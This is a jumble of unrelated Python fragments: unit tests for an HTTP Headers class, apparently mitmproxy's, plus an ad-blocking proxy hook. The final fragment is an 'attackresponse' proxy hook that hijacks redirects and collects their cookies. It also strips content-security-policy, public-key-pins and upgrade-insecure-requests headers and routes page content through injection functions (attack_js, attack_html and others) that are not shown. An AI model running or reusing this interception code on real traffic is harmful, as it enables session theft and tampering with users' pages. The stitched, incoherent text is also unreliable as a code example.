def test_replace_simple(self): headers = Headers(Host="example.com", Accept="text/plain") replacements = headers.replace("Host: ", "X-Host: ") assert replacements == 1 assert headers["X-Host"] == "example.com" assert "Host" not in headers assert headers["Accept"] == "text/plain"
def test_bytes(self): headers = Headers(Host="example.com") assert bytes(headers) == b"Host: example.com\r\n" headers = Headers([[b"Host", b"example.com"], [b"Accept", b"text/plain"]]) assert bytes(headers) == b"Host: example.com\r\nAccept: text/plain\r\n" headers = Headers() assert bytes(headers) == b""
def _2host(self): return Headers( ( (b"Host", b"example.com"), (b"host", b"example.org") ) )
def request(context, flow): req = flow.request # accept = flow.request.headers["Accept"] # context.log("accept: %s" % flow.request.accept) options = {'domain': req.host} if IMAGE_MATCHER.search(req.path): options["image"] = True elif SCRIPT_MATCHER.search(req.path): options["script"] = True elif STYLESHEET_MATCHER.search(req.path): options["stylesheet"] = True if rules.should_block(req.url, options): context.log("vvvvvvvvvvvvvvvvvvvv BLOCKED vvvvvvvvvvvvvvvvvvvvvvvvvvv") context.log("accept: %s" % flow.request.headers.get("Accept")) context.log("blocked-url: %s" % flow.request.url) context.log("^^^^^^^^^^^^^^^^^^^^ BLOCKED ^^^^^^^^^^^^^^^^^^^^^^^^^^^") # resp = HTTPResponse((1,1), 404, "OK", # ODictCaseless([["Content-Type", "text/html"]]), # "A terrible ad has been removed!") # HTTPResponse(http_version, status_code, reason, headers, content, timestamp_start=None, timestamp_end=None) # resp = HTTPResponse( # (1,1), # 200, # "OK", # ODictCaseless( # [ # ["Content-Type", "text/html"] # ] # ), # "BLOCKED." # ) # def __init__( # self, # http_version, # status_code, # reason, # headers, # content, # timestamp_start=None, # timestamp_end=None, # is_replay=False resp = HTTPResponse( b"HTTP/1.1", #(1,1), 200, "OK", Headers(content_type="text/html; charset=utf-8"), b"BLOCKED", ) flow.reply(resp) else: context.log("url: %s" % flow.request.url)
def test_set(self): headers = Headers() headers[u"foo"] = u"1" headers[b"bar"] = b"2" headers["baz"] = b"3" with raises(TypeError): headers["foobar"] = 42 assert len(headers) == 3
def test_init(self): headers = Headers() assert len(headers) == 0 headers = Headers([[b"Host", b"example.com"]]) assert len(headers) == 1 assert headers["Host"] == "example.com" headers = Headers(Host="example.com") assert len(headers) == 1 assert headers["Host"] == "example.com" headers = Headers( [[b"Host", b"invalid"]], Host="example.com" ) assert len(headers) == 1 assert headers["Host"] == "example.com" headers = Headers( [[b"Host", b"invalid"], [b"Accept", b"text/plain"]], Host="example.com" ) assert len(headers) == 2 assert headers["Host"] == "example.com" assert headers["Accept"] == "text/plain" with raises(TypeError): Headers([[b"Host", u"not-bytes"]])
def test_replace_remove_spacer(self): headers = Headers(Host="example.com") replacements = headers.replace(r"Host: ", "X-Host ") assert replacements == 0 assert headers["Host"] == "example.com"
def test_replace_with_count(self): headers = Headers(Host="foobarfoo.com", Accept="foo/bar") replacements = headers.replace("foo", "bar", count=1) assert replacements == 1
def attackresponse(context, flow): #{{{ # flow.response.headers["Testing123"] = "456" url = flow.request.url # on 301/302: fetch the resource completely and return it, but pay attention to cookies! if hijackRedirects and flow.response.status_code in [301, 302]: # this should not fail, but you never know if "location" in flow.response.headers: logging.debug("Hijacking redirected %s" % url) logResponse(url, { "hijackedRedirect": True }) # make the same request, but log all cookies reqsess = requests.Session() myheaders = flow.request.headers for h in ["host"]: if h in myheaders: del myheaders[h] newresp = reqsess.get(url, headers = myheaders) # add the new cookies newcookies = ["%s=%s" % (k,v) for k,v in reqsess.cookies.items()] newheaders = newresp.headers.items() for c in newcookies: newheaders += [("Set-Cookie", c)] # compose result to browser flow.response.code = newresp.status_code flow.response.reason = newresp.reason flow.response.headers = Headers(newheaders) flow.response.content = newresp.content if "content-encoding" in flow.response.headers: flow.response.encode(flow.response.headers["content-encoding"]) # also update stickycookies with newly learned cookies context._master.process_new_response(flow) # throw away some headers for h in ["content-security-policy", "public-key-pins", "upgrade-insecure-requests"]: if h in flow.response.headers: logging.info("Removing header '%s': '%s'" % (h, flow.response.headers[h])) del flow.response.headers[h] logResponse(url, { "headers": { h: True }}) else: logResponse(url, { "headers": { h: False }}) if "content-type" in flow.response.headers: mimetype = flow.response.headers.get_all("content-type")[0] else: mimetype = "" mimetype = "" logResponse(url, { "content-type": mimetype }) with decoded(flow.response): url = flow.request.url data = flow.response.content urlparts = urlparse(url) data = attack_js(url, urlparts, mimetype, data) data = attack_html(url, urlparts, mimetype, data) data = attack_swf(url, urlparts, mimetype, data) data = attack_css(url, urlparts, mimetype, data) # write back data flow.response.content = data